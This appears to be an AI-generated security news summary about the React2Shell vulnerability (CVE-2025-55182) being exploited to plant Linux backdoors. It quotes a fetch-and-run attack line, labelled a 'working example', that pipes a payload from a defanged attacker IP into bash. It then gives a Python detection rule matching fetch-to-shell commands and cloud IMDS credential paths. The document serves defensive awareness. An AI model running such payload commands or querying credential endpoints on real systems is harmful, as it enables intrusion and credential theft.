React2Shell Vulnerability Actively Exploited to Deploy Linux Backdoors

These articles are AI-generated summaries. Please check the original sources for full details.

The React2Shell vulnerability (CVE-2025-55182), a critical flaw in the React server-side rendering library, is currently being exploited by multiple threat actors to deliver Linux malware families such as KSwapDoor and ZnDoor. Google has identified at least five China-nexus groups actively weaponizing the flaw, which shows how broadly attractive it is to attackers.

Why This Matters

Current security models often rely on patching and rapid response, but the scale of this exploitation highlights the challenge of defending against zero-day vulnerabilities in widely used libraries. The vulnerability allows remote code execution, letting attackers deploy backdoors and steal credentials at scale; the estimated compromise of over 59,000 servers underscores the potential for significant financial and operational damage.

Key Insights

  • CVE-2025-55182 (CVSS score: 10.0): Critical vulnerability in React server-side rendering.
  • KSwapDoor vs. BPFDoor: Initial misclassification of KSwapDoor highlights the importance of thorough malware analysis; KSwapDoor features a complex peer-to-peer router for lateral movement, unlike BPFDoor.
  • Operation PCPcat: Campaign impacting over 59,128 servers, demonstrating large-scale intelligence gathering and data exfiltration.

Working Example

# Example ZnDoor attack chain (from NTT Security report)
wget http://45.76.155[.]14/payload.sh | bash

Practical Applications

  • Cloud Providers: AWS, Azure, and GCP are being targeted for credential theft via IMDS endpoints.
  • Pitfall: Reliance on basic input validation can leave applications vulnerable to remote code execution exploits like React2Shell, leading to complete system compromise.
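As an added defensive example (not from this summary or the reports it cites), the following Python sketch shows how a detection rule could tie the two stages described here together: a React SSR process (Node.js) spawning a fetch-to-shell command in the shape of the ZnDoor chain above, followed on the same host by a non-agent process reading cloud credentials from the IMDS endpoint. Process names, the IMDS allowlist and the sample events are constructed assumptions, not observed telemetry.

```python
import re
from collections import defaultdict

# 169.254.169.254 serves instance metadata on AWS, Azure and GCP alike;
# the credential-bearing paths differ per provider.
IMDS_HOST = "169.254.169.254"
IMDS_CRED_PATHS = (
    "/latest/meta-data/iam/security-credentials",      # AWS
    "/metadata/identity/oauth2/token",                 # Azure managed identity
    "/computeMetadata/v1/instance/service-accounts",   # GCP
)
# Agents expected to query IMDS (assumed allowlist; tune per fleet).
IMDS_ALLOWED_PARENTS = {"cloud-init", "amazon-ssm-agent", "google_guest_agent", "walinuxagent"}
# Parent processes hosting React SSR (assumed; a shell spawned from one is already suspect).
SSR_PARENTS = {"node"}
# Remote fetch whose output is handed to a shell, as in the ZnDoor chain above.
FETCH_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|]*\|\s*(ba)?sh\b")

def classify_event(ev):
    """Return a tag for one process event, or None if it looks benign."""
    if ev["parent"] in SSR_PARENTS and FETCH_TO_SHELL.search(ev["cmd"]):
        return "ssr_spawned_fetch_to_shell"
    url = ev.get("url") or ""
    if IMDS_HOST in url and any(p in url for p in IMDS_CRED_PATHS):
        if ev["parent"] not in IMDS_ALLOWED_PARENTS:
            return "imds_credential_access"
    return None

def find_chains(events):
    """Collect tags per host; a host showing both stages is a likely post-exploitation chain."""
    tags = defaultdict(set)
    for ev in events:
        tag = classify_event(ev)
        if tag:
            tags[ev["host"]].add(tag)
    return {host: ("chain" if len(t) == 2 else "single") for host, t in tags.items()}

# Constructed sample events (not from any report); addresses are documentation ranges.
IMDS_AWS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
SAMPLE_EVENTS = [
    {"host": "web-01", "parent": "node", "cmd": "sh -c 'wget http://203.0.113.7/payload.sh | bash'"},
    {"host": "web-01", "parent": "bash", "cmd": "curl", "url": IMDS_AWS},
    {"host": "web-02", "parent": "cloud-init", "cmd": "cloud-init", "url": IMDS_AWS},   # expected agent
    {"host": "web-03", "parent": "node", "cmd": "sh -c 'npm run build'"},                # benign spawn
    {"host": "web-04", "parent": "bash", "cmd": "curl",
     "url": "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"},
]

if __name__ == "__main__":
    for host, verdict in find_chains(SAMPLE_EVENTS).items():
        print(host, verdict)
```

In real telemetry the events would come from an EDR or auditd process-exec feed plus egress logs; the same two-stage correlation also applies to other SSR-hosting runtimes once their process names are added to the allowlists.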
